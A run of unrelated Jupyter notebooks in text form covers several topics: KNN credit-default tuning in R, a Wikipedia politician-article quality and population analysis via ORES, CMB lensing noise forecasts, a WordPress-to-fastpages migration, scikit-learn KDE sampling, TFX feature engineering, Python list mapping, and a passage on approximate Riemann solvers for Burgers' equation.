"https://localhost:8080/", "height": 72} id="lSDqAk5lTua7" outputId="420e7666-195c-4a1d-8602-d18d61b51b3c" err.rate <- mean(model != default_test) err.rate Acc <- 1 - err.rate Acc # + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="67G_nAOZeDqW" outputId="e596ee8f-0ab9-48e5-d389-2dfa3dca7bf5" save.pred <- data.frame() for (K in 135:175) { pred <- knn(df_train_knn, df_test_knn, cl = default_train, k = K) error.rate <- mean(pred != default_test) save.pred <- rbind(save.pred, data.frame(error.rate, K)) } save.pred # + colab={"base_uri": "https://localhost:8080/", "height": 457} id="720hxN-bfy8V" outputId="a0cd0349-32b8-47c5-bcdc-b20d70a91907" plot(save.pred$K, save.pred$error.rate) # + id="dep3Pkxff_lj" error.rate <- mean(caret.knn != dfsmall_test) error.rate Acc <- 1 - error.rate Acc ### RMSE as well? pred <- predict(caret.knn, newdata = dfsmall_test) RMSE(pred = pred, obs = dfsmall_test$Default) # + colab={"base_uri": "https://localhost:8080/", "height": 982} id="5bHR5pGrhKBg" outputId="30d6f9d1-8dc4-42ab-ae87-cc649c2ff8dc" save.pred.lowk <- data.frame() for (K in 1:40) { pred <- knn(df_train_knn, df_test_knn, cl = default_train, k = K) error.rate <- mean(pred != default_test) save.pred.lowk <- rbind(save.pred.lowk, data.frame(error.rate, K)) } save.pred.lowk # + colab={"base_uri": "https://localhost:8080/", "height": 457} id="N_HYS_jyhTfM" outputId="7cd9c4ee-fff0-4ca8-d726-21bb70e53b05" plot(save.pred.lowk$K, save.pred.lowk$error.rate) # + colab={"base_uri": "https://localhost:8080/", "height": 982} id="KPZwUAhUj20P" outputId="f72c740a-ddcd-4b58-f16e-620c84c7ad0a" save.pred.medk <- data.frame() for (K in 41:80) { pred <- knn(df_train_knn, df_test_knn, cl = default_train, k = K) error.rate <- mean(pred != default_test) save.pred.medk <- rbind(save.pred.medk, data.frame(error.rate, K)) } save.pred.medk # + colab={"base_uri": "https://localhost:8080/", "height": 457} id="bymlkZAFkGD8" outputId="21f68cc5-05a5-40df-b7cc-2f1ffee507d8" plot(save.pred.medk$K, save.pred.medk$error.rate) # + colab={"base_uri": "https://localhost:8080/", "height": 291} id="MNyMHd4-kgap" outputId="bd1cc9e9-e977-4f60-9216-84c0ac8da4cc" save.pred.lowk[which.min(save.pred.lowk$error.rate),] save.pred.medk[which.min(save.pred.medk$error.rate),] save.pred[which.min(save.pred$error.rate),] # + [markdown] id="MfZe7O6zlO24" # Looks like the best k would be k = 30 # + [markdown] id="qJMyU-p6OeQ0" # # KNN in Caret # + id="hs9J-1slOZqE" # + id="s_n0B7n3OZtX" fitControl10 <- trainControl(## 10-fold CV method = "repeatedcv", number = 10, ## repeated ten times repeats = 10 ) tune_grid = expand.grid(k=150:160) # + colab={"base_uri": "https://localhost:8080/"} id="nmziFXOQQTSZ" outputId="f0e6d9f3-edd4-4418-e660-1dfeebc44f07" str(tune_grid) # + id="IxZpvAxYPJq9" caret.knn.cv10 <- train(Default ~ ., data = df_train, method = "knn", preProcess = c('center', 'scale')) # + id="tNmcvwJfkU38" caret.knn.cv10 <- train(Default ~ ., data = df_train, method = "knn", trControl = fitControl10, preProcess = c('center', 'scale')) # + id="1q2ftv8DgphV" # varImp(caret.knn.cv10) # Function can be used with caret, but not with preious model # When it works with caret this will be very useful
UCI_Credit_KNN.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 (ipykernel) # language: python # name: python3 # --- import numpy as np import pandas as pd # # Read the CSV Files page_data = pd.read_csv("../data/page_data.csv") page_data.head() population = pd.read_csv("../data/WPDS_2020_data - WPDS_2020_data.csv") population.head() # # Data Processing # The page_data contains some page names that start with the string "Template:". These pages are not Wikipedia articles, and should not be included in your analysis. # Filter out the data with page names starting with "Template:" page_data = page_data[~page_data['page'].str.startswith('Template:')] # Reset the index page_data.reset_index(drop=True, inplace=True) page_data.head() # WPDS_2020_data.csv contains some rows that provide cumulative regional population counts, rather than country-level counts. These rows are distinguished by having ALL CAPS values in the 'geography' field (e.g. AFRICA, OCEANIA). These rows won't match the country values in page_data.csv. # Get the population of countries. (Excluding cumulative regional counts) population_country = population[population['Type'] == 'Country'] population_country.reset_index(drop=True, inplace=True) population_country.head() # # Obtain article quality # Now you need to get the predicted quality scores for each article in the Wikipedia dataset. We're using a machine learning system called ORES. This was originally an acronym for "Objective Revision Evaluation Service" but was simply renamed “ORES”. ORES is a machine learning tool that can provide estimates of Wikipedia article quality. The article quality estimates are, from best to worst: # # FA - Featured article # GA - Good article # B - B-class article # C - C-class article # Start - Start-class article # Stub - Stub-class article # # These were learned based on articles in Wikipedia that were peer-reviewed using the Wikipedia content assessment procedures.These quality classes are a sub-set of quality assessment categories developed by Wikipedia editors. For this assignment, you only need to know that these categories exist, and that ORES will assign one of these 6 categories to any rev_id you send it. # # In order to get article predictions for each article in the Wikipedia dataset, you will first need to read page_data.csv into Python (or R), and then read through the dataset line by line, using the value of the rev_id column to make an API query. # # Obtain rev_ids as a list rev_ids = page_data['rev_id'].tolist() # + import requests headers = { 'User-Agent': 'https://github.com/azhou5211', 'From': '<EMAIL>' } def api_call(endpoint, rev_id): """ Function used to call API. Will return response. :param endpoint: API URL endpoint :param parameters: Parameter settings in the API call """ call = requests.get(endpoint.format(rev_id=rev_id), headers=headers) response = call.json() return response # - request_url = 'https://ores.wikimedia.org/v3/scores/enwiki/{rev_id}/articlequality' # Get the article quality for each wikipedia article article_quality = [] for rev_id in rev_ids: response = api_call(request_url, rev_id) try: pred = response['enwiki']['scores'][str(rev_id)]['articlequality']['score']['prediction'] except: pred = np.nan article_quality.append(pred) # Add the article quality into the pages dataframe page_data['quality'] = article_quality page_data.head() # List of wikipedia pages that did not have a predicted quality from the ORES # List of wikipedia pages that did not have a predicted quality from ORES page_data[page_data['quality'].isna()] page_data[page_data['quality'].isna()].to_csv("Non-Predicted ORES pages.csv", index=False) # Filter the page_data to include only the values that have a predicted quality page_data_filtered = page_data[~page_data['quality'].isna()] page_data_filtered # # Combining the datasets # Merge the wikipedia data and population data together. # Both have fields containing country names for just that purpose. After merging the data, you'll invariably run into entries which cannot be merged. Either the population dataset does not have an entry for the equivalent Wikipedia country, or vise versa. # df = page_data_filtered.merge(population_country, left_on='country', right_on='Name', how='left') df # Filter to only the relevant columns df = df[['country','page','rev_id','quality','Population']] df.rename(columns={'page':'article_name','rev_id':'revision_id','quality':'article_quality_est.','Population':'population'}, inplace=True) df # Filter the rows that do not have data and output it to # ```wp_wpds_countries-no_match.csv``` df[df['population'].isna()].to_csv("../output_files/wp_wpds_countries-no_match.csv", index=False) df[df['population'].isna()] # Filter the df to contain non null values. Output the dataframe to ```wp_wpds_politicians_by_country.csv``` df = df[~df['population'].isna()] df.to_csv("../output_files/wp_wpds_politicians_by_country.csv", index=False) df # # Analysis # Calculate the proportion (as a percentage) of articles-per-population and high-quality articles for each country AND for each geographic region. # By "high quality" articles, in this case we mean the number of articles about politicians in a given country that ORES predicted would be in either the "FA" (featured article) or "GA" (good article) classes. # Filter the data to include only "high" quality articles df_analysis = df[(df['article_quality_est.']=='FA') | (df['article_quality_est.']=='GA')] df_analysis # Groupby country to get the count of high quality papers df_analysis_country = df_analysis.groupby('country').agg({"article_quality_est.":'count', 'population':'first'}) df_analysis_country.rename(columns={"article_quality_est.":"count_of_high_quality"}, inplace=True) df_analysis_country # Calculate the percentage of articles per population df_analysis_country['percentage_of_articles-per-population'] = df_analysis_country['count_of_high_quality']/df_analysis_country['population'] df_analysis_country # Get the total count of articles and add it to the analysis dataframe count_of_articles = df.groupby('country').agg({"article_quality_est.":'count'}) df_analysis_country = df_analysis_country.merge(count_of_articles, how="left", left_index=True, right_index=True) df_analysis_country # Calculate the percentage of high-quality articles df_analysis_country['percentage_of_high-quality_articles'] = df_analysis_country['count_of_high_quality']/df_analysis_country['article_quality_est.'] df_analysis_country.rename(columns={'article_quality_est.':'total_count'}, inplace=True) df_analysis_country # # Results # ### Top 10 countries by coverage: 10 highest-ranked countries in terms of number of politician articles as a proportion of country population df_analysis_country.sort_values(by=['percentage_of_articles-per-population'], ascending=False).head(10) # ### Bottom 10 countries by coverage: 10 lowest-ranked countries in terms of number of politician articles as a proportion of country population df_analysis_country.sort_values(by=['percentage_of_articles-per-population']).head(10) # ### Top 10 countries by relative quality: 10 highest-ranked countries in terms of the relative proportion of politician articles that are of GA and FA-quality df_analysis_country.sort_values(by=['percentage_of_high-quality_articles'], ascending=False).head(10) # ### Bottom 10 countries by relative quality: 10 lowest-ranked countries in terms of the relative proportion of politician articles that are of GA and FA-quality # df_analysis_country.sort_values(by=['percentage_of_high-quality_articles']).head(10) # Geographic regions by coverage: Ranking of geographic regions (in descending order) in terms of the total count of politician articles from countries in each region as a proportion of total regional population # Obtain the regions from the population dataframe # + region = "NORTHERN AFRICA" regions = ['WORLD', 'AFRICA', 'NORTHERN AFRICA'] for i in range(3, len(population)): if population.iloc[i]['Type']=='Sub-Region': region = population.iloc[i]['Name'] regions.append(region) # - population['Region'] = regions population df_analysis_country.reset_index(inplace=True) # Merge the region with analysis df_analysis_country_ = df_analysis_country.merge(population[['Name', 'Region']], left_on='country', right_on='Name', how='left') df_analysis_country_.drop(columns=['Name'], inplace=True) df_analysis_country_ # Groupby region and sum the paper counts df_analysis_region = df_analysis_country_.groupby('Region').agg({'count_of_high_quality':'sum','total_count':'sum'}) df_analysis_region # Merge the population value population_region = population[population['Type']=='Sub-Region'] df_analysis_region_ = df_analysis_region.merge(population_region[['Name', 'Population']], left_index=True, right_on='Name') df_analysis_region_ # Calculate percentage of articles-per-population and percentage of high-quality articles by region df_analysis_region_['percentage_of_articles-per-population'] = df_analysis_region_['count_of_high_quality']/df_analysis_region_['Population'] df_analysis_region_['percentage_of_high-quality_articles'] = df_analysis_region_['count_of_high_quality']/df_analysis_region_['total_count'] df_analysis_region_ = df_analysis_region_[['Name', 'percentage_of_articles-per-population', 'percentage_of_high-quality_articles']] df_analysis_region_.rename(columns={'Name':'Region'}, inplace=True) df_analysis_region_ # ### Geographic regions by coverage: Ranking of geographic regions (in descending order) in terms of the total count of politician articles from countries in each region as a proportion of total regional population df_analysis_region_.sort_values(by=['percentage_of_articles-per-population'], ascending=False) # ### Geographic regions by coverage: Ranking of geographic regions (in descending order) in terms of the relative proportion of politician articles from countries in each region that are of GA and FA-quality df_analysis_region_.sort_values(by=['percentage_of_high-quality_articles'], ascending=False)
notebooks/hcds-a2-bias.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 2 # language: python # name: python2 # --- # %load_ext autoreload # %autoreload 2 from __future__ import print_function import numpy as np from orphics import lensing,io,stats,cosmology,maps # + # Initialize cosmology and Clkk. Later parts need dimensionless spectra. lmax = 3000 cc = cosmology.Cosmology(lmax=lmax,pickling=True,dimensionless=True) theory = cc.theory ells = np.arange(2,lmax,1) clkk = theory.gCl('kk',ells) pl = io.Plotter(yscale='log') pl.add(ells,clkk) pl.done() # - # Make a map template for calculating the noise curve on shape,wcs = maps.rect_geometry(width_deg = 5.,px_res_arcmin=1.5) # Define bin edges for noise curve bin_edges = np.arange(80,2100,20) nlgen = lensing.NlGenerator(shape,wcs,theory,bin_edges,lensedEqualsUnlensed=True) # Experiment parameters, here for Planck beam = 1.5 noiseT = 1. noiseP = 1.4 tellmin = 100 tellmax = 3000 pellmin = 100 pellmax = 3000 kmin = 20 kmax = 3000 polCombs = ['TT','TE','EE','EB','TB'] _,_,_,_ = nlgen.updateNoise(beamX=beam,noiseTX=noiseT,noisePX=noiseP,tellminX=tellmin,tellmaxX=tellmax,pellminX=pellmin,pellmaxX=pellmax) ls,nls,bells,nlbb,efficiency = nlgen.getNlIterative(polCombs,kmin,kmax,tellmax,pellmin,pellmax,verbose=True,plot=False) # The result is noise curve nls defined at bin centers ls pl = io.Plotter(yscale='log') pl.add(ells,clkk) pl.add(ls,nls,ls='--') pl._ax.set_ylim(1.e-9,1.e-5) pl.done() # + LF = cosmology.LensForecast() LF.loadKK(ells,clkk,ls,nls) lmin = 2 lmax = 3000 dell = 1 ellBinEdges = np.arange(lmin,lmax,dell) lcents = (ellBinEdges[1:]+ellBinEdges[:-1])/2. var, sigs1, sigs2 = LF.KnoxCov("kk","kk",ellBinEdges,500./41250) print(np.sqrt(sigs1)) pl = io.Plotter() pl.add(lcents,np.sqrt(sigs1)) pl.done() # + LF = cosmology.LensForecast() LF.loadKK(ells,clkk,ls,nls) lminfid = 100 lmaxfid = 500 dell = 10 sns = [] lmins = np.arange(2,lminfid,dell) for lmin in lmins: ellBinEdges = np.arange(lmin,lmaxfid,dell) sn,errs = LF.sn(ellBinEdges,500./41250.,"kk") sns.append(sn) pl = io.Plotter() pl.add(lmins,sns) pl.done() sns = [] lmaxs = np.arange(lmaxfid,3000,dell) for lmax in lmaxs: ellBinEdges = np.arange(lminfid,lmax,dell) sn,errs = LF.sn(ellBinEdges,500./41250.,"kk") sns.append(sn) pl = io.Plotter() pl.add(lmaxs,sns) pl.done() # -
tutorials/Lensing-noise-curves-SN.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # WordPress to Fastpages # > Converting wordpress blogs to fastpages # I'm testing out fastpages - a great new tool that (among other things) let's you write blog posts in Jupyter and host them for free using Github pages. This post documents how I moved my past blog posts across from wordpress (datasciencecastnet.home.blog) into fastpages. # # ## The Steps # # These are the basic steps I followed: # # - Set up a fastpages repository by following the instructions (https://fastpages.fast.ai/fastpages/jupyter/2020/02/21/introducing-fastpages.html) # - Export XML from wordpress. I used the standard process, Tools -> Export -> Export All (https://wordpress.org/support/article/tools-export-screen/) to get an XML file that contains all my posts etc. # - Convert the XML export to markdown. I used https://github.com/lonekorean/wordpress-export-to-markdown. I had to install npm with ‘sudo apt install npm’ and then I placed my XML file in the same folder as the script and ran ‘npx wordpress-export-to-markdown’, following the prompts to create files with the right date format. I chose not to place them in separate folders, and didn’t save images scraped from the post body since this caused an error. You can drop these markdown files into the `_posts` folder of your fastpages repository - they'll appear as soon as it finished building! # # Some optional extra steps to deal with images: # # - Export the media from my wordpress. The markdown files link to images hosted by wordpress, but these seem to load really slowly. Exporting the images and saving them in a 'wordpress_export' folder within the 'images' folder of the fastpages blog let's you have full control over the images and hosting. # - Change the image references in the markdown posts. There are various ways you could do this, but since this post is a jupyter notebook let's do it with a bit of python code! # # + # Get a list of posts import glob posts = glob.glob('../_posts/*.md') # replace the image URLs to point to our new images for post in posts: s = open(post, 'r').read() s = s.replace('https://datasciencecastnethome.files.wordpress.com', '{{ site.baseurl }}/images/wordpress_export') f = open(post, 'w') f.write(s) f.close() # - # Push your changes, and wait a few minutes for the build process to finish. Then check out your shiny new blog!
_notebooks/2020-02-25-wordpress-export.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # %matplotlib inline # # # Kernel Density Estimation # # # This example shows how kernel density estimation (KDE), a powerful # non-parametric density estimation technique, can be used to learn # a generative model for a dataset. With this generative model in place, # new samples can be drawn. These new samples reflect the underlying model # of the data. # # # + import numpy as np import matplotlib.pyplot as plt from sklearn.datasets import load_digits from sklearn.neighbors import KernelDensity from sklearn.decomposition import PCA from sklearn.model_selection import GridSearchCV # load the data digits = load_digits() data = digits.data # project the 64-dimensional data to a lower dimension pca = PCA(n_components=15, whiten=False) data = pca.fit_transform(digits.data) # use grid search cross-validation to optimize the bandwidth params = {'bandwidth': np.logspace(-1, 1, 20)} grid = GridSearchCV(KernelDensity(), params) grid.fit(data) print("best bandwidth: {0}".format(grid.best_estimator_.bandwidth)) # use the best estimator to compute the kernel density estimate kde = grid.best_estimator_ # sample 44 new points from the data new_data = kde.sample(44, random_state=0) new_data = pca.inverse_transform(new_data) # turn data into a 4x11 grid new_data = new_data.reshape((4, 11, -1)) real_data = digits.data[:44].reshape((4, 11, -1)) # plot real digits and resampled digits fig, ax = plt.subplots(9, 11, subplot_kw=dict(xticks=[], yticks=[])) for j in range(11): ax[4, j].set_visible(False) for i in range(4): im = ax[i, j].imshow(real_data[i, j].reshape((8, 8)), cmap=plt.cm.binary, interpolation='nearest') im.set_clim(0, 16) im = ax[i + 5, j].imshow(new_data[i, j].reshape((8, 8)), cmap=plt.cm.binary, interpolation='nearest') im.set_clim(0, 16) ax[0, 5].set_title('Selection from the input data') ax[5, 5].set_title('"New" digits drawn from the kernel density model') plt.show()
scikit-learn-official-examples/neighbors/plot_digits_kde_sampling.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 2 # language: python # name: python2 # --- # # Step 4: Feature Engineering # # Use the code below to run TensorFlow Transform on some example data using the schema from your pipeline. Start by importing and opening the metadata store. # + from __future__ import print_function import os import tempfile import pandas as pd import tfx_utils import tensorflow_transform as tft from tensorflow_transform import beam as tft_beam from tfx.utils import io_utils from tensorflow_metadata.proto.v0 import schema_pb2 # For DatasetMetadata boilerplate from tensorflow_transform.tf_metadata import dataset_metadata from tensorflow_transform.tf_metadata import dataset_schema from tensorflow_transform.tf_metadata import schema_utils def _make_default_sqlite_uri(pipeline_name): return os.path.join(os.environ['HOME'], 'airflow/tfx/metadata', pipeline_name, 'metadata.db') def get_metadata_store(pipeline_name): return tfx_utils.TFXReadonlyMetadataStore.from_sqlite_db(_make_default_sqlite_uri(pipeline_name)) pipeline_name = 'taxi' pipeline_db_path = _make_default_sqlite_uri(pipeline_name) print('Pipeline DB:\n{}'.format(pipeline_db_path)) store = get_metadata_store(pipeline_name) # - # Get the schema URI from the metadata store # Get the schema URI from the metadata store schemas = store.get_artifacts_of_type_df(tfx_utils.TFXArtifactTypes.SCHEMA) assert len(schemas.URI) == 1 schema_uri = schemas.URI.iloc[0] + 'schema.pbtxt' print ('Schema URI:\n{}'.format(schema_uri)) # Get the schema that was inferred by TensorFlow Data Validation schema_proto = io_utils.parse_pbtxt_file(file_name=schema_uri, message=schema_pb2.Schema()) feature_spec, domains = schema_utils.schema_as_feature_spec(schema_proto) legacy_metadata = dataset_metadata.DatasetMetadata(dataset_schema.from_feature_spec(feature_spec, domains)) # Define features and create functions for TensorFlow Transform # + # Need to re-import because currently taxi_utils.py imports as `transform` not `tft` import tensorflow_transform as transform import tensorflow as tf # Categorical features are assumed to each have a maximum value in the dataset. _MAX_CATEGORICAL_FEATURE_VALUES = [24, 31, 12] _CATEGORICAL_FEATURE_KEYS = [ 'trip_start_hour', 'trip_start_day', 'trip_start_month', 'pickup_census_tract', 'dropoff_census_tract', 'pickup_community_area', 'dropoff_community_area' ] _DENSE_FLOAT_FEATURE_KEYS = ['trip_miles', 'fare', 'trip_seconds'] # Number of buckets used by tf.transform for encoding each feature. _FEATURE_BUCKET_COUNT = 10 _BUCKET_FEATURE_KEYS = [ 'pickup_latitude', 'pickup_longitude', 'dropoff_latitude', 'dropoff_longitude' ] # Number of vocabulary terms used for encoding VOCAB_FEATURES by tf.transform _VOCAB_SIZE = 1000 # Count of out-of-vocab buckets in which unrecognized VOCAB_FEATURES are hashed. _OOV_SIZE = 10 _VOCAB_FEATURE_KEYS = [ 'payment_type', 'company', ] # Keys _LABEL_KEY = 'tips' _FARE_KEY = 'fare' def _transformed_name(key): return key + '_xf' def _transformed_names(keys): return [_transformed_name(key) for key in keys] def _fill_in_missing(x): """Replace missing values in a SparseTensor. Fills in missing values of `x` with '' or 0, and converts to a dense tensor. Args: x: A `SparseTensor` of rank 2. Its dense shape should have size at most 1 in the second dimension. Returns: A rank 1 tensor where missing values of `x` have been filled in. """ default_value = '' if x.dtype == tf.string else 0 return tf.squeeze( tf.sparse_to_dense(x.indices, [x.dense_shape[0], 1], x.values, default_value), axis=1) def preprocessing_fn(inputs): """tf.transform's callback function for preprocessing inputs. Args: inputs: map from feature keys to raw not-yet-transformed features. Returns: Map from string feature key to transformed feature operations. """ outputs = {} for key in _DENSE_FLOAT_FEATURE_KEYS: # Preserve this feature as a dense float, setting nan's to the mean. outputs[_transformed_name(key)] = transform.scale_to_z_score( _fill_in_missing(inputs[key])) for key in _VOCAB_FEATURE_KEYS: # Build a vocabulary for this feature. outputs[_transformed_name(key)] = transform.compute_and_apply_vocabulary( _fill_in_missing(inputs[key]), top_k=_VOCAB_SIZE, num_oov_buckets=_OOV_SIZE) for key in _BUCKET_FEATURE_KEYS: outputs[_transformed_name(key)] = transform.bucketize( _fill_in_missing(inputs[key]), _FEATURE_BUCKET_COUNT) for key in _CATEGORICAL_FEATURE_KEYS: outputs[_transformed_name(key)] = _fill_in_missing(inputs[key]) # Was this passenger a big tipper? taxi_fare = _fill_in_missing(inputs[_FARE_KEY]) tips = _fill_in_missing(inputs[_LABEL_KEY]) outputs[_transformed_name(_LABEL_KEY)] = tf.where( tf.is_nan(taxi_fare), tf.cast(tf.zeros_like(taxi_fare), tf.int64), # Test if the tip was > 20% of the fare. tf.cast( tf.greater(tips, tf.multiply(taxi_fare, tf.constant(0.2))), tf.int64)) return outputs # - # Display the results of transforming some example data from IPython.display import display with tft_beam.Context(temp_dir=tempfile.mkdtemp()): raw_examples = [ { "fare": [100.0], "trip_start_hour": [12], "pickup_census_tract": ['abcd'], "dropoff_census_tract": [12345.0], # No idea why this is a float "company": ['taxi inc.'], "trip_start_timestamp": [123456], "pickup_longitude": [12.0], "trip_start_month": [5], "trip_miles": [8.0], "dropoff_longitude": [12.05], "dropoff_community_area": [123], "pickup_community_area": [123], "payment_type": ['visa'], "trip_seconds": [600.0], "trip_start_day": [12], "tips": [10.0], "pickup_latitude": [80.0], "dropoff_latitude": [80.01], } ] (transformed_examples, transformed_metadata), transform_fn = ( (raw_examples, legacy_metadata) | 'AnalyzeAndTransform' >> tft_beam.AnalyzeAndTransformDataset( preprocessing_fn)) display(pd.DataFrame(transformed_examples))
notebooks/step4.ipynb
# --- # title: "Apply Operations Over Items In A List" # author: "<NAME>" # date: 2017-12-20T11:53:49-07:00 # description: "Apply Operations Over Items In A List" # type: technical_note # draft: false # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # ## Method 1: map() # Create a list of casualties from battles battleDeaths = [482, 93, 392, 920, 813, 199, 374, 237, 244] # Create a function that updates all battle deaths by adding 100 def updated(x): return x + 100 # Create a list that applies updated() to all elements of battleDeaths list(map(updated, battleDeaths)) # ## Method 2: for x in y # Create a list of deaths casualties = [482, 93, 392, 920, 813, 199, 374, 237, 244] # Create a variable where we will put the updated casualty numbers casualtiesUpdated = [] # Create a function that for each item in casualties, adds 10 for x in casualties: casualtiesUpdated.append(x + 100) # View casualties variables casualtiesUpdated # ## Method 3: lambda functions # Map the lambda function x() over casualties list(map((lambda x: x + 100), casualties))
docs/python/basics/apply_operations_over_items_in_lists.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # An approximate solver for Burgers' equation # As a first example, we return to the inviscid Burgers' equation that we studied in [Burgers.ipynb](Burgers.ipynb): # \begin{align} \label{burgers} # q_t + \left(\frac{1}{2}q^2\right)_x & = 0. # \end{align} # Although it is easy to solve the Riemann problem for (\ref{burgers}) exactly, it is nevertheless interesting to consider approximate solvers because a numerical scheme does not make use of the full Riemann solution. Furthermore, Burgers' equation provides a simple setting in which some of the intricacies of more complicated approximate solvers can be introduced. Recall that we are interested in **approximate solutions that consist entirely of traveling discontinuities**. # ## Shock wave solutions # # Recall that the exact Riemann solution for (\ref{burgers}) consists of a single shock or rarefaction wave. We have a shock if $q_l>q_r$ and we have a rarefaction if $q_l < q_r$. In the case of a shock wave, we can simply use the exact solution as our approximation. We have a single wave of strength $q_r-q_l$ traveling at speed $s=(q_r+q_l)/2$. # # In terms of fluxes, the numerical flux is $F=f(q_l)$ if $s>0$ and $F=f(q_r)$ if $s<0$. In the special case $s=0$ we have a stationary shock, and it must be that $f(q_l)=f(q_r) (=F)$. # ## Rarefaction wave solutions # # As discussed in [Approximate_solvers.ipynb](Approximate_solvers.ipynb), for numerical purposes it is convenient to approximate a rarefaction wave by a traveling discontinuity. For Burgers' equation this may seem unnecessary, but for more complicated solvers for systems of equations it will be essential. # # We will approximate the effect of the rarefaction wave by a fictitious shock: # $${\cal W} = q_r-q_l$$ # whose speed is given by the Rankine-Hugoniot jump condition: # $$s = \frac{f(q_r)-f(q_l)}{q_r-q_l} = \frac{q_r + q_l}{2}.$$ # Recall that this is indeed a weak solution of the Riemann problem. This fictitious shock is not entropy-satisfying, but as long as it's traveling entirely to the left or entirely to the right, the effect on the numerical solution will be the same as if we used a (entropy-satisfying) rarefaction wave. The numerical flux is again $F=f(q_l)$ if $s>0$ and $F=f(q_r)$ if $s<0$. # Because this is a scalar equation with convex flux, both the Roe and HLL approaches will simplify to what we have already described. But we briefly discuss them here to further illustrate the main ideas. # ## A Roe solver # Let us consider a linearized solver, in which we replace our nonlinear hyperbolic system with a linearization about some intermediate state $\hat{q}$. For Burgers' equation, the quasilinear form is $q_t + q q_x = 0$ and the linearization gives # $$q_t + \hat{q}q_x = 0.$$ # This is simply the advection equation with velocity $\hat{q}$. The solution of the Riemann problem for this equation consists of a wave ${\cal W} = q_r - q_l$ traveling at speed $\hat{q}$. It remains only to determine the state $\hat{q}$, and thus the wave speed. # # The defining feature of a Roe linearization is that it gives the exact solution in case the states $(q_r, q_l)$ lie on a single Hugoniot locus -- i.e., when the solution is a single shock. We can achieve this by choosing # $$\hat{q} = \frac{q_r + q_l}{2}.$$ # This is equivalent to using the approximate solver described already in the sections above. # ### Examples # Below we show solutions for three examples; the first involves a shock, the second a (non-transonic) rarefaction, and the third a transonic rarefaction. In the first row we plot the exact solution (computed using code from [exact_solvers/burgers.py](exact_solvers/burgers.py)) in terms of the waves in the x-t plane; in the second row we plot numerical solutions obtained with Clawpack by using a simple first-order method combined with the Riemann solver. The code for the Riemann solver as used in Clawpack can be examined [in the Riemann github repository](https://github.com/clawpack/riemann/blob/c0a41c664e9a13d35a113409dea92f3c87648d09/riemann/burgers_1D_py.py) or by looking at the local copy on your computer if you have installed Clawpack. # + tags=["hide"] # %matplotlib inline # + tags=["hide"] # %config InlineBackend.figure_format = 'svg' import matplotlib.pyplot as plt from ipywidgets import interact from ipywidgets import widgets from ipywidgets import IntSlider from exact_solvers import burgers from utils import riemann_tools # - def setup(q_l, q_r, N=500, efix=False): from clawpack import pyclaw from clawpack import riemann rs = riemann.burgers_1D_py.burgers_1D solver = pyclaw.ClawSolver1D(rs) solver.order = 1 solver.kernel_language = 'Python' solver.bc_lower[0]=pyclaw.BC.extrap solver.bc_upper[0]=pyclaw.BC.extrap x = pyclaw.Dimension(-1.0,1.0,N,name='x') domain = pyclaw.Domain([x]) state = pyclaw.State(domain,1) state.problem_data['efix'] = efix xc = state.grid.p_centers[0] state.q[0 ,:] = (xc<=0)*q_l + (xc>0)*q_r claw = pyclaw.Controller() claw.tfinal = 0.5 claw.solution = pyclaw.Solution(state,domain) claw.solver = solver claw.keep_copy = True claw.verbosity=0 return claw # + shock = setup(2.,1.) shock.run() shocksol = burgers.exact_riemann_solution(2.,1.) raref = setup(1.,2.) raref.run() rarefsol = burgers.exact_riemann_solution(1.,2.) transonic = setup(-1.,2.) transonic.run() transonicsol = burgers.exact_riemann_solution(-1.,2.) def plot_frame(i): fig, axes = plt.subplots(2,3,figsize=(8,4)) for ax in axes[0]: ax.set_xlim((-1,1)); ax.set_ylim((-1.1,2.1)) sxc = shock.frames[0].grid.x.centers rxc = raref.frames[0].grid.x.centers txc = transonic.frames[0].grid.x.centers axes[1][0].plot(sxc, shock.frames[i].q[0,:],'-k',lw=2) axes[1][0].set_title('Shock') axes[1][1].plot(rxc, raref.frames[i].q[0,:],'-k',lw=2) axes[1][1].set_title('Rarefaction') axes[1][2].plot(txc, transonic.frames[i].q[0,:],'-k',lw=2) axes[1][2].set_title('Transonic rarefaction') t = i/10. riemann_tools.plot_waves(*shocksol,ax=axes[0][0],t=t) riemann_tools.plot_waves(*rarefsol,ax=axes[0][1],t=t) riemann_tools.plot_waves(*transonicsol,ax=axes[0][2],t=t) plt.tight_layout() plt.show() interact(plot_frame, i=IntSlider(min=0, max=10, description='Frame')); # - # The solutions obtained for the shock wave and for the first rarefaction wave are good approximations of the true solution. In the case of the transonic rarefaction, however, we see that part of the rarefaction has been replaced by an entropy-violating shock. At the end of this chapter we will show how to apply an *entropy fix* so that the solver gives a good approximation also in the transonic case. # ## Two-wave solvers # For Burgers' equation, the Riemann solution consists only of a single wave. It is thus natural to modify the HLL approach by assuming that one of the waves vanishes, and denote the speed of the other wave simply by $s$. Then the conservation condition discussed in [Approximate_solvers.ipynb](Approximate_solvers.ipynb#Two-wave-solvers) reduces to # $$f(q_r) - f(q_l) = s (q_r - q_l),$$ # which is just the Rankine-Hugoniot condition and again leads to the speed discussed above. Since the solution involves only one wave, that wave must carry the entire jump $q_r - q_l$, so this solver is entirely equivalent to that already described. # # It is also possible to follow the full HLL approach, taking # \begin{align*} # s_1 & = \min f'(q) = \min(q_l, q_r) \\ # s_2 & = \max f'(q) = \max(q_l, q_r). # \end{align*} # Regardless of the values of $q_l$ and $q_r$, this leads to # $$q_m = \frac{q_r + q_l}{2},$$ # so that each of the two waves carries half of the jump. # ## Transonic rarefactions # # In the 